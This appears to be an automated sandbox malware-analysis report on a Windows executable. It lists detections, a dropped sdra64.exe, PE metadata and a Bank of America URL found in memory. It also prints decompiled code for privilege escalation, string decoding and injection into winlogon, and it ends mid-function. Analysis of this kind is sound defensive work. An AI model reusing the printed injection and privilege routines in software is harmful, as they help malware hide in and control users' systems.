2.2.winlogon.exe.114a0000.604.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11ba0000.660.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

Source  Detection  Scanner  Label
https://onlineeast#.bankofamerica.com/cgi-bin/ias/  0%  Avira URL Cloud  safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name:https://onlineeast#.bankofamerica.com/cgi-bin/ias/
Source:Ue0N2amgcH.exe, 00000000.00000002.464238365.00000000023F3000.00000004.00000040.sdmp
Malicious:false
Antivirus Detection:
  • Avira URL Cloud: safe
Reputation:low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:381781
Start date:05.04.2021
Start time:02:57:32
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 25s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Ue0N2amgcH (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:27
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.winEXE@1/2@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 98.7% (good quality ratio 93.4%)
  • Quality average: 83.9%
  • Quality standard deviation: 27.7%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\SysWOW64\sdra64.exe
Process:C:\Users\user\Desktop\Ue0N2amgcH.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):439808
Entropy (8bit):7.486506470434463
Encrypted:false
SSDEEP:12288:tKLKS3ugwI5Z1BRzmWwP05WLNl6ZHkMR0xiDkAMf:tKLyg9vDRzmHP05Y6+iDkV
MD5:66E599A0E60235530CE34127717CBD69
SHA1:7E42442474AD8BAF2BD39EDBCD771728879194BF
SHA-256:6DFB5E87C7226012F130032F4F8F9B9A3C1193843A11F0C1418CA3654AD78A83
SHA-512:B7A0D723BD45E7037E1C53CC6E0FBC13906F3DDE598A9FCEAE8BA4057FD859B2416A4D37129568C306BE810E43D2FB5644EF66656BAC1C8202C06056CE55F245
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......77uQsV..sV..sV..V.).LV...0M.\V..`8..DV..mQ.."V...a...V.......V..j....V..RichsV..................................................................................PE..L...b..G.....................X....................@..........................p..................................................d....................................................................................................................text............................... ..`.rdata..............................@..@.data....P..........................@...........................................................................................................................................................................................................................................................................................................................................................
C:\Windows\SysWOW64\sdra64.exe:Zone.Identifier
Process:C:\Users\user\Desktop\Ue0N2amgcH.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.18265444554369
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Ue0N2amgcH.exe
File size:60928
MD5:ccb2db4a8a284f62db7002be470ac542
SHA1:b2bdb5ed1ff743117cdf8500a498e247febbb6ec
SHA256:4fb04b099a37aeae2f58685b8fb08bca298f8f68d5dfc45ceb9fa398e9f109ea
SHA512:1472e175170bb13173963b479cd90e304b58554908b27caa0e813c47eaf8f85ac3783ce9240cab70a2d6349840ea5069cf44196695f64fdddf1a68ba1ce68f29
SSDEEP:768:dtwaDQxDzRaaLoXfZ1yjpenwgb4uDAv5RhahPUCrjtrSfnnd8LCPCct8WL6pPlBa:puRuXzjh4k2gUgoPdNLYPba
File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......77uQsV..sV..sV..V.).LV...0M.\V..`8..DV..mQ.."V...a...V.......V..j....V..RichsV.................................................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x4081b7
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x47DCEE62 [Sun Mar 16 09:54:42 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:41da589848b0ea7c32b44ddd22d7ade5

Entrypoint Preview

Instruction
call 00007FC730833680h
xor edi, edi
mov esi, dword ptr [esp]
add esp, 04h
retn 0024h
xor esi, esi
push 00000000h
push 00BC7A6Dh
push 00000004h
push 00000000h
push 00CCBE13h
push 00000007h
push 00000000h
call dword ptr [00410084h]
and eax, 000000FDh
xor edx, edx
mov dl, al
add esi, edx
cmp esi, 3FFCD967h
jnl 00007FC730833674h
jmp 00007FC730833643h
mov bl, dl
xor eax, eax
mov eax, 0000F607h
add eax, 00088C23h
sub eax, 00088B52h
mov ecx, edx
sub esp, 04h
mov dword ptr [esp], ecx
sub esp, 04h
mov dword ptr [esp], 00000040h
sub esp, 04h
mov dword ptr [esp], 00003000h
push eax
push 00000000h
call dword ptr [0041007Ch]
pop ecx
mov ecx, esi
mov esi, dword ptr [esp]
mov edi, eax
add esi, 00000103h
sub esp, 04h
mov dword ptr [esp], eax
mov ecx, 000001DBh
mov edx, CE0E523Dh
mov ebp, 00000000h
mov bh, byte ptr [esi]
add bh, dl
sub esi, 000B54D0h
add esi, 000B54D1h
add bh, bl
mov byte ptr [edi], bh
inc edi
sub esp, 04h
mov dword ptr [esp], edx
push ecx
push 00000000h
push 00000007h
push 00000005h
push 00000000h
push 00000000h
push 008AF758h

Data Directories

Name  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_IMPORT  0x100f0  0x64  .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE  0x0  0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION  0x0  0x0
IMAGE_DIRECTORY_ENTRY_SECURITY  0x0  0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC  0x0  0x0
IMAGE_DIRECTORY_ENTRY_DEBUG  0x0  0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR  0x0  0x0
IMAGE_DIRECTORY_ENTRY_TLS  0x0  0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG  0x0  0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_IAT  0x10000  0xa0  .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT  0x0  0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0  0x0
IMAGE_DIRECTORY_ENTRY_RESERVED  0x0  0x0

Sections

Name  Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy  Characteristics
.text  0x1000  0xe1f0  0xe200  False  0.886874308628  data  7.30372755134  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x10000  0x508  0x600  False  0.509765625  data  4.76117916035  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  0x11000  0x50cb  0x200  False  0.087890625  data  0.483984725135  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL  Import
ole32.dll:  StgOpenStorageOnILockBytes, ReadClassStg, CoQueryProxyBlanket, OleLoad, PropVariantClear, WriteStringStream, StgCreateDocfileOnILockBytes, CoRegisterMessageFilter, CoGetCallerTID, StgOpenStorage
SHLWAPI.dll:  UrlIsNoHistoryW, PathGetArgsW, PathMakePrettyW, wnsprintfW, SHRegSetUSValueA, PathRemoveArgsA, SHQueryInfoKeyA, StrToIntA, PathIsUNCA
KERNEL32.dll:  WriteConsoleW, CopyFileExW, GetAtomNameA, SetConsoleCursorPosition, OpenSemaphoreW, EnumCalendarInfoExA, IsBadHugeWritePtr, SetConsoleActiveScreenBuffer, CreateDirectoryExA, SetNamedPipeHandleState, VirtualAlloc, VirtualProtect, CreateFileA
ADVAPI32.dll:  BuildImpersonateExplicitAccessWithNameA, CryptGenRandom, CryptDestroyHash, SetEntriesInAuditListA

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time:02:58:17
Start date:05/04/2021
Path:C:\Users\user\Desktop\Ue0N2amgcH.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\Ue0N2amgcH.exe'
Imagebase:0x400000
File size:60928 bytes
MD5 hash:CCB2DB4A8A284F62DB7002BE470AC542
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:02:58:18
Start date:05/04/2021
Path:C:\Windows\System32\winlogon.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff739090000
File size:677376 bytes
MD5 hash:F9017F2DC455AD373DF036F5817A8870
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 91%
    			E00409475() {
    				signed int _v5;
    				long _v12;
    				short _v532;
    				void* __ebx;
    				void* _t34;
    				void* _t36;
    				void* _t38;
    				char _t42;
    				void* _t45;
    				long _t46;
    				void* _t48;
    				void* _t50;
    				int _t53;
    				char* _t57;
    				void* _t58;
    				intOrPtr _t63;
    				void* _t65;
    				signed int _t66;
    				signed int _t71;
    				void* _t73;
    				void* _t75;
    				intOrPtr _t76;
    				signed int _t80;
    				char* _t84;
    				void* _t86;
    				signed char* _t90;
    				void* _t91;
    
    				 *0x412af8 =  *0x412af8 & 0x00000000;
    				_t34 = E00408A16();
    				if(_t34 != 0) {
    					 *0x4129ec =  *0x4129ec | 0xffffffff;
    					 *0x412bac = E00409909(E004093CD); // executed
    					_t36 = HeapCreate(0, 0x80000, 0); // executed
    					 *0x413e5c = _t36;
    					if(_t36 != 0) {
    						 *0x412707 = 1;
    					} else {
    						 *0x413e5c = GetProcessHeap();
    						 *0x412707 = 0;
    					}
    					E004105E8();
    					 *0x412e5c = 0;
    					 *0x41272e = 0;
    					_t38 = RtlAllocateHeap( *0x413e5c, 8, 0x184);
    					 *0x412a64 = _t38;
    					if(_t38 != 0) {
    						_v12 = 0;
    						while(1) {
    							_t71 = (_v12 & 0x0000ffff) << 2;
    							_t41 = ( *( *(_t71 + 0x412020)) & 0x000000ff) + 1;
    							if(( *( *(_t71 + 0x412020)) & 0x000000ff) + 1 == 0) {
    								break;
    							}
    							_t84 = E0040CF2D(_t41);
    							if(_t84 == 0) {
    								break;
    							} else {
    								_t90 =  *(_t71 + 0x412020);
    								_v5 = 0;
    								if( *_t90 > 0) {
    									_t66 = 0;
    									_t73 = 0xba;
    									do {
    										_v5 = _v5 + 1;
    										 *((char*)(_t66 + _t84)) = ( &(_t90[1]))[_t66] + _t73;
    										_t66 = _v5 & 0x000000ff;
    										_t73 = _t73 + 2;
    									} while (_t66 <  *_t90);
    								}
    								 *((char*)((_v5 & 0x000000ff) + _t84)) = 0;
    								if( *_t84 != 0x57) {
    									_t45 =  *0x412a64; // 0x246f5a8
    									 *((intOrPtr*)(_t45 + _t71)) = _t84 + 1;
    									goto L17;
    								} else {
    									_t15 = _t84 + 1; // 0x1
    									_t63 = E0040D379(( *( *(_t71 + 0x412020)) & 0x000000ff) - 1, _t15);
    									_t75 =  *0x412a64; // 0x246f5a8
    									 *((intOrPtr*)(_t75 + _t71)) = _t63;
    									E0040CF40(_t84);
    									_t65 =  *0x412a64; // 0x246f5a8
    									if( *((intOrPtr*)(_t65 + _t71)) != 0) {
    										L17:
    										_v12 = _v12 + 1;
    										if(_v12 < 0x60) {
    											continue;
    										} else {
    											_t46 = GetCurrentProcessId();
    											_t76 =  *0x412bac; // 0x400000
    											 *0x412ba0 = _t46;
    											_t22 = _t76 + 0x3c; // 0x120
    											_t48 =  *_t22 + _t76;
    											_t80 =  *(_t48 + 6) & 0x0000ffff;
    											_t91 = 0;
    											if(_t80 > 0) {
    												_t86 = 3;
    												if(_t86 < _t80) {
    													_t58 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x90;
    													_t91 =  *((intOrPtr*)(_t58 + 0xc)) + _t76;
    													if(IsBadHugeReadPtr(_t91,  *(_t58 + 8)) != 0) {
    														_t91 = 0;
    													}
    												}
    											}
    											 *0x412a8c = _t91;
    											 *0x412a78 =  *0x412c98(); // executed
    											_t50 = E0040F0FC(L"SeDebugPrivilege"); // executed
    											if(_t50 == 0) {
    												 *0x412af8 =  *0x412af8 | 0x00000001;
    											}
    											_v12 = 0x103;
    											_t53 = GetUserNameW( &_v532,  &_v12); // executed
    											if(_t53 == 0) {
    												L26:
    												 *0x4129e8 = "-";
    											} else {
    												_t57 = E0040CF93( &_v532, _v12 + _v12);
    												 *0x4129e8 = _t57;
    												if(_t57 == 0) {
    													goto L26;
    												}
    											}
    											_t42 = 1;
    										}
    									} else {
    										break;
    									}
    								}
    							}
    							L28:
    							goto L29;
    						}
    						_t42 = 0;
    						goto L28;
    					} else {
    						_t42 = 0;
    					}
    					L29:
    					return _t42;
    				} else {
    					return _t34;
    				}
    			}

    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 004094B1
    • GetProcessHeap.KERNEL32 ref: 004094C0
    • RtlAllocateHeap.NTDLL(00000008,00000184), ref: 004094FA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Heap$AllocateCreateProcess
    • String ID: SeDebugPrivilege$`
    • API String ID: 3901675031-4146895512
    • Opcode ID: 291f9c010bc795d013228392d3dc50e08bda455651a36e092512f83fb44b98a1
    • Instruction ID: e57fa5d3d93a770b57eb5b91877c2a6989448357b630b411715358be4720e600
    • Opcode Fuzzy Hash: 291f9c010bc795d013228392d3dc50e08bda455651a36e092512f83fb44b98a1
    • Instruction Fuzzy Hash: CF512330504211AFDB218F65ED847EA7BA5EF11308F0480BBE840E72E3D7B98A55CB6C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406689(void* _a4) {
    				void* _v8;
    				signed int _v12;
    				long _v16;
    				intOrPtr _v20;
    				void* _v24;
    				void* _t61;
    				intOrPtr _t64;
    				intOrPtr _t66;
    				void* _t67;
    				void* _t77;
    				long _t81;
    				intOrPtr* _t84;
    				void* _t85;
    				void* _t86;
    				void* _t87;
    				void* _t91;
    				intOrPtr _t93;
    				unsigned int _t95;
    				signed int _t97;
    				void* _t103;
    				long _t105;
    				void* _t106;
    				long* _t107;
    				void* _t109;
    				void* _t111;
    
    				_t86 =  *0x412bac; // 0x400000
    				_t1 = _t86 + 0x3c; // 0x120
    				_t111 =  *_t1 + _t86;
    				_v24 = _t86;
    				_t61 = VirtualAllocEx(_a4,  *(_t111 + 0x34),  *(_t111 + 0x50), 0x2000, 1); // executed
    				_v8 = _t61;
    				if(_t61 != 0) {
    					L3:
    					_t62 =  *(_t111 + 0x50);
    					if( *(_t111 + 0x50) == 0) {
    						L2:
    						return 0;
    					}
    					_t64 = E0040CF2D(_t62);
    					_v20 = _t64;
    					if(_t64 == 0) {
    						goto L2;
    					}
    					E0040CF7C(_t64, _t86,  *(_t111 + 0x50));
    					_t66 =  *((intOrPtr*)(_t111 + 0xa0));
    					if(_t66 == 0 ||  *((intOrPtr*)(_t111 + 0xa4)) == 0) {
    						L16:
    						_t105 =  *(_t111 + 0x54);
    						_t67 = VirtualAllocEx(_a4, _v8, _t105, 0x1000, 4); // executed
    						if(_t67 == 0) {
    							goto L2;
    						}
    						WriteProcessMemory(_a4, _v8, _t86, _t105, 0); // executed
    						VirtualProtectEx(_a4, _v8, _t105, 2,  &_v16); // executed
    						_v12 = _v12 & 0x00000000;
    						_t106 = ( *(_t111 + 0x14) & 0x0000ffff) + _t111 + 0x18;
    						if(0 >=  *(_t111 + 6)) {
    							L21:
    							E0040CF40(_v20);
    							return _v8;
    						}
    						_t107 = _t106 + 8;
    						while(1) {
    							_t77 = VirtualAllocEx(_a4, _v8 + _t107[1],  *_t107, 0x1000, 4); // executed
    							_t87 = _t77;
    							if(_t87 == 0) {
    								goto L2;
    							}
    							WriteProcessMemory(_a4, _t87, _t107[1] + _v20,  *_t107, 0); // executed
    							_t81 = 0x40;
    							_v16 = _t81;
    							VirtualProtectEx(_a4, _t87,  *_t107, _t81,  &_v16); // executed
    							_t107 =  &(_t107[0xa]);
    							_v12 = _v12 + 1;
    							if(_v12 < ( *(_t111 + 6) & 0x0000ffff)) {
    								continue;
    							}
    							goto L21;
    						}
    						goto L2;
    					} else {
    						_t91 =  *(_t111 + 0x34);
    						_t103 = _v8 - _t91;
    						_t109 = _t86 - _t91;
    						_t84 = _t66 + _v20;
    						while( *_t84 != 0) {
    							_t93 =  *((intOrPtr*)(_t84 + 4));
    							if(_t93 < 8) {
    								L14:
    								_t84 = _t84 +  *((intOrPtr*)(_t84 + 4));
    								continue;
    							}
    							_t95 = _t93 + 0xfffffff8 >> 1;
    							_v16 = _t95;
    							_v12 = 0;
    							if(_t95 == 0) {
    								goto L14;
    							} else {
    								goto L10;
    							}
    							do {
    								L10:
    								_t97 =  *(_t84 + 8 + _v12 * 2) & 0x0000ffff;
    								if(_t97 != 0) {
    									 *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) =  *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) + _t103 - _t109;
    								}
    								_v12 = _v12 + 1;
    							} while (_v12 < _v16);
    							_t86 = _v24;
    							goto L14;
    						}
    						goto L16;
    					}
    				}
    				_t85 = VirtualAllocEx(_a4, _t61,  *(_t111 + 0x50), 0x2000, 1); // executed
    				_v8 = _t85;
    				if(_t85 != 0) {
    					goto L3;
    				}
    				goto L2;
    			}

    APIs
    • VirtualAllocEx.KERNELBASE(?,?,?,00002000,00000001,00000000,00000000,00000000,?,?,?), ref: 004066B1
    • VirtualAllocEx.KERNELBASE(?,00000000,?,00002000,00000001,?,?), ref: 004066C8
    • VirtualAllocEx.KERNELBASE(?,?,?,00001000,00000004,00000000,00400000,?,?,?), ref: 0040677D
    • WriteProcessMemory.KERNELBASE(?,?,00400000,?,00000000,?,?), ref: 00406795
    • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?,?,?), ref: 004067A8
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00001000,00000004,?,?), ref: 004067D8
    • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000,?,?), ref: 004067F7
    • VirtualProtectEx.KERNELBASE(00000000,00000000,?,00000040,?,?,?), ref: 0040680E
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Virtual$Alloc$MemoryProcessProtectWrite
    • String ID:
    • API String ID: 426431698-0
    • Opcode ID: d768156162df72b3616f17d480a812c65aab4c8ee0314080ba2cf48f3fc17398
    • Instruction ID: 671572708ff2695cd44bb262c6223c739609e082facb42a51842ca87b1629f13
    • Opcode Fuzzy Hash: d768156162df72b3616f17d480a812c65aab4c8ee0314080ba2cf48f3fc17398
    • Instruction Fuzzy Hash: CC518E71A00209FFDB119F94CD84FAEBBB5FF44748F118029F502AB6A0D775A960DB18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405808() {
    				short _v524;
    				intOrPtr _v552;
    				void* _v560;
    				void* _t10;
    				struct tagPROCESSENTRY32W* _t11;
    				int _t19;
    				signed short _t20;
    				intOrPtr _t21;
    				void* _t22;
    				signed short _t24;
    
    				_t20 = 0;
    				_v560 = 0x22c;
    				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
    				_t22 = _t10;
    				_t11 =  &_v560;
    				Process32FirstW(_t22, _t11); // executed
    				if(_t11 != 0) {
    					do {
    						_t24 = 0;
    						if(_v552 != 0) {
    							while(1) {
    								_t21 =  *0x412a64; // 0x246f5a8
    								_t19 = lstrcmpiW( &_v524,  *(_t21 + ( *(0x401a04 + (_t24 & 0x0000ffff) * 2) & 0x0000ffff) * 4)); // executed
    								if(_t19 == 0) {
    									break;
    								}
    								_t24 = _t24 + 1;
    								if(_t24 < 2) {
    									continue;
    								} else {
    								}
    								goto L7;
    							}
    							_t20 = 1;
    						}
    						L7:
    					} while (Process32NextW(_t22,  &_v560) != 0);
    				}
    				FindCloseChangeNotification(_t22); // executed
    				return _t20;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405823
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00405833
    • lstrcmpiW.KERNELBASE(?,0246F5A8,?,?,00000000), ref: 00405863
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00405880
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 0040588C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
    • String ID:
    • API String ID: 545148253-0
    • Opcode ID: 9357cc00b5358a273a8b6434f4b0c663d109436b9335d0f8ea867cd90425e417
    • Instruction ID: bf89a223184001ba136491f712bac1afb94fed6ecbb59cfac22fa003c3c655c8
    • Opcode Fuzzy Hash: 9357cc00b5358a273a8b6434f4b0c663d109436b9335d0f8ea867cd90425e417
    • Instruction Fuzzy Hash: F1017532601118ABD7216B71ED4DBFF77BCEB45741F108076E801E21A0E674C965CF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F0FC(WCHAR* _a4) {
    				void* _v8;
    				intOrPtr _v12;
    				struct _TOKEN_PRIVILEGES _v24;
    				void* _t9;
    				int _t13;
    				int _t16;
    				long _t19;
    
    				_t9 =  *0x4129ec; // 0xffffffff
    				_t19 = 0;
    				if(OpenProcessToken(_t9, 0x28,  &_v8) != 0) {
    					_v24.PrivilegeCount = 1;
    					_v12 = 2;
    					_t13 = LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
    					if(_t13 != 0) {
    						_t16 = AdjustTokenPrivileges(_v8, 0,  &_v24, 0x10, 0, 0); // executed
    						if(_t16 != 0 && GetLastError() == 0) {
    							_t19 = 1;
    						}
    					}
    					FindCloseChangeNotification(_v8); // executed
    				}
    				return _t19;
    			}

    APIs
    • OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040961C,SeDebugPrivilege), ref: 0040F111
    • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 0040F131
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0040F147
    • GetLastError.KERNEL32 ref: 0040F151
    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040F160
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorFindLastLookupNotificationOpenPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 1669889876-0
    • Opcode ID: 8ffefae96f612d502892da737631cf4df35e726e6f624f484a82ce5858d57198
    • Instruction ID: a4c96a2da6c2e1322850cf4be798d752422cfab52bbfbec5e57f1cff82fb6d85
    • Opcode Fuzzy Hash: 8ffefae96f612d502892da737631cf4df35e726e6f624f484a82ce5858d57198
    • Instruction Fuzzy Hash: 2B01FF71600109EFEB209FA5DD89AEF77BDEB04784F004035B505E5290E7B49E149B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004093CD(CHAR* __ecx, void* __edx, intOrPtr _a4) {
    				struct HINSTANCE__* _t6;
    				_Unknown_base(*)()* _t10;
    				void* _t12;
    				signed short _t16;
    				CHAR** _t17;
    				struct HINSTANCE__* _t18;
    
    				_t12 = __edx; // executed
    				_t6 = LoadLibraryA(__ecx); // executed
    				_t18 = _t6;
    				if(_t18 == 0) {
    					L4:
    					return _t18;
    				}
    				_t16 = 0;
    				if(0 >= _a4) {
    					goto L4;
    				} else {
    					goto L2;
    				}
    				while(1) {
    					L2:
    					_t17 = _t12 + (_t16 & 0x0000ffff) * 8;
    					_t10 = GetProcAddress(_t18,  *_t17);
    					if(_t10 == 0) {
    						break;
    					}
    					_t16 = _t16 + 1;
    					 *(_t17[1]) = _t10;
    					if(_t16 < _a4) {
    						continue;
    					}
    					goto L4;
    				}
    				return 0;
    			}

    APIs
    • LoadLibraryA.KERNELBASE(kernel32.dll), ref: 004093D4
    • GetProcAddress.KERNELBASE(00000000), ref: 004093F4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: kernel32.dll
    • API String ID: 2574300362-1793498882
    • Opcode ID: 537b4c57a40e628cd78d5274c451dd8f8f39061c96c2c4521d1963abea68c647
    • Instruction ID: 589cceb3c227e5a1be29c681a73e1a78987006d7dcae856c58f6ba6b963a2b81
    • Opcode Fuzzy Hash: 537b4c57a40e628cd78d5274c451dd8f8f39061c96c2c4521d1963abea68c647
    • Instruction Fuzzy Hash: BDF0A7313082156BC7219F65AD44477B799EBC5741301483AF942E3192EA758C53D67C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			_entry_(void* __ebx, void* __edi, void* __esi) {
    				signed int _v5;
    				int _v12;
    				signed int _v13;
    				long _v20;
    				void* _v24;
    				char _v28;
    				struct _FILETIME _v36;
    				struct _FILETIME _v44;
    				struct _FILETIME _v52;
    				short _v572;
    				short _v1092;
    				void* _t76;
    				intOrPtr _t78;
    				void* _t79;
    				signed int _t80;
    				signed int _t83;
    				intOrPtr _t84;
    				intOrPtr _t90;
    				signed int _t95;
    				signed int _t98;
    				void* _t101;
    				signed int _t105;
    				intOrPtr _t106;
    				signed int _t107;
    				intOrPtr _t108;
    				void* _t119;
    				signed int _t122;
    				intOrPtr _t125;
    				void* _t129;
    				long _t142;
    				intOrPtr _t150;
    				void* _t151;
    				intOrPtr _t154;
    				intOrPtr _t156;
    				intOrPtr _t158;
    				signed int _t159;
    				void* _t164;
    				signed int _t165;
    				signed int _t172;
    				void* _t174;
    				void* _t175;
    				intOrPtr _t176;
    				void* _t177;
    				void* _t178;
    				void* _t180;
    				void* _t181;
    
    				_t177 = __esi;
    				E0040664A(); // executed
    				_t76 = E00409475(); // executed
    				if(_t76 == 0) {
    					return 0;
    				}
    				_v12 = 0;
    				_t172 = GetCommandLineA();
    				__eflags = _t172;
    				if(_t172 == 0) {
    					L11:
    					_t78 =  *0x412a64; // 0x246f5a8
    					_t79 = CreateMutexW(0x413468, 1,  *(_t78 + 0x30)); // executed
    					_v24 = _t79;
    					_t80 = GetLastError();
    					__eflags = _t80;
    					if(_t80 != 0) {
    						L48:
    						__eflags = _v24;
    						if(_v24 != 0) {
    							CloseHandle(_v24);
    						}
    						E0040FB22(_t170, _t172);
    						ExitProcess(0);
    					}
    					_t83 = E00405808(); // executed
    					_v5 = _t83;
    					_t84 =  *0x412a64; // 0x246f5a8
    					_v20 = 0;
    					_v13 = 0;
    					__eflags = E00409241( *((intOrPtr*)(_t84 + 0x2c)));
    					if(__eflags == 0) {
    						L23:
    						_push(_t177);
    						GetModuleFileNameW(0,  &_v1092, 0x104);
    						E0040966F( &_v572);
    						_t90 =  *0x412a64; // 0x246f5a8
    						PathCombineW( &_v572,  &_v572,  *(_t90 + 0xc));
    						_t95 = lstrcmpiW( &_v1092,  &_v572);
    						__eflags = _t95;
    						_push( &_v572);
    						if(_t95 == 0) {
    							_v5 = 0;
    							E00409B88();
    							L38:
    							__eflags = _v5;
    							if(_v5 == 0) {
